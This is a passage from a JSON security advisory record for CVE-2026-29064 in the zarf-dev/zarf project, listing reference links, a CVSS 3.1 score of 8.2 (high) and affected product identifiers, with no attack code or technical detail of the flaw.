                    "url": "https://github.com/advisories/GHSA-hcm4-6hpj-vghm"
                },
                {
                    "category": "external",
                    "summary": "Source raw - github",
                    "url": "https://api.github.com/advisories/GHSA-hcm4-6hpj-vghm"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-hcm4-6hpj-vghm.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-29064"
                },
                {
                    "category": "external",
                    "summary": "Source raw - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://api.github.com/advisories/GHSA-hcm4-6hpj-vghm"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4636.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/GIT%2FCVE-2026-29064.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/zarf-dev/zarf/security/advisories/GHSA-hcm4-6hpj-vghm"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/zarf-dev/zarf/releases/tag/v0.73.1"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29064"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-hcm4-6hpj-vghm"
                },
                {
                    "category": "external",
                    "summary": "Reference - osv",
                    "url": "https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/29xxx/CVE-2026-29064.json"
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N",
                        "baseScore": 8.2,
                        "baseSeverity": "HIGH"
                    },
                    "products": [
                        "CSAFPID-5766944",
                        "CSAFPID-5783973",
                        "CSAFPID-5910237",
                        "CSAFPID-5910238",
                        "CSAFPID-5910239",
                        "CSAFPID-5910240",
                        "CSAFPID-5910241",
                        "CSAFPID-5910242",
                        "CSAFPID-5910243",
                        "CSAFPID-5910244",
                        "CSAFPID-5910245",
                        "CSAFPID-5910246",
                        "CSAFPID-5910247",
                        "CSAFPID-5910248",
                        "CSAFPID-5910249",
                        "CSAFPID-5910250",
                        "CSAFPID-5910251",
                        "CSAFPID-5910252",
                        "CSAFPID-5910253",
                        "CSAFPID-5910254",
                        "CSAFPID-5910255",
                        "CSAFPID-5910256",
                        "CSAFPID-5910257",
                        "CSAFPID-5910258",
                        "CSAFPID-5910259",
                        "CSAFPID-5910260",
                        "CSAFPID-5910261",
                        "CSAFPID-5910262",
                        "CSAFPID-5910263",
                        "CSAFPID-5910264",
                        "CSAFPID-5910265",
                        "CSAFPID-5910266",
                        "CSAFPID-5910267",
                        "CSAFPID-5910268",
                        "CSAFPID-5910269",
                        "CSAFPID-5910270",
                        "CSAFPID-5910271",
                        "CSAFPID-5910272",
                        "CSAFPID-5910273",
                        "CSAFPID-5910274",
                        "CSAFPID-5910275",
                        "CSAFPID-5910276",
                        "CSAFPID-5910277",
                        "CSAFPID-5910278"
                    ]
                }
            ],
            "title": "CVE-2026-29064"
        }
    ]
}